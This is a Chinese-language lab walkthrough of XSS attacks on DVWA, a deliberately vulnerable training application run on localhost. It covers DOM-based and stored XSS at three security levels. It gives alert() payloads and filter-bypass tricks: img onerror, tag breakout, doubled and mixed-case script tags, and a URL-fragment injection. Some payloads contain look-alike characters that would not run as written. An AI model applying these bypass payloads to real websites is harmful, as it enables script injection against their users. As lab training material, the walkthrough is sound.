dvwa xss dom型、存储型三级别实战
dom型xss低中高级别实战
Vulnerability: DOM Based Cross Site Scripting (XSS) m型xss低中高级别实战
Low
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert("You have been hacked!");</script>
Medium
发现对"<script>"标签做了过滤,所以只能尝试其他的标签了,比如<img>的onerror属性,
即img引用出错时会执行onerror中的内容
Payload:?default=English>/option></select><img src='x' onerror='alert(1)'>
注意要闭合了前面的标签,当然了,也可以URL编码之后在GET上去。
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English>/option></select><img src='x' οnerrοr='alert(1)'>
High
http://127.0.0.1/dvwa/vulnerabilities/xss_d/
?default=English#<script>alert(/xss/)</script>
存储型xss低中高级别实战
Vulnerability: Stored Cross Site Scripting (XSS)
Low
message一栏输入<script>alert(/xss/)</script>,成功弹框:
name一栏前端有字数限制,抓包改为<script>alert(/name/)</script>:
Medium
双写绕过
抓包改name参数为<sc<script>ript>alert(/xss/)</script>:
大小写混淆绕过
抓包改name参数为<Script>alert(/xss/)</script>:
High
这里使用正则表达式过滤了<script>标签,但是却忽略了img、iframe等其它危险的标签,
因此name参数依旧存在存储型XSS。
抓包改name参数为<img src=1 οnerrοr=alert(1)>:
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗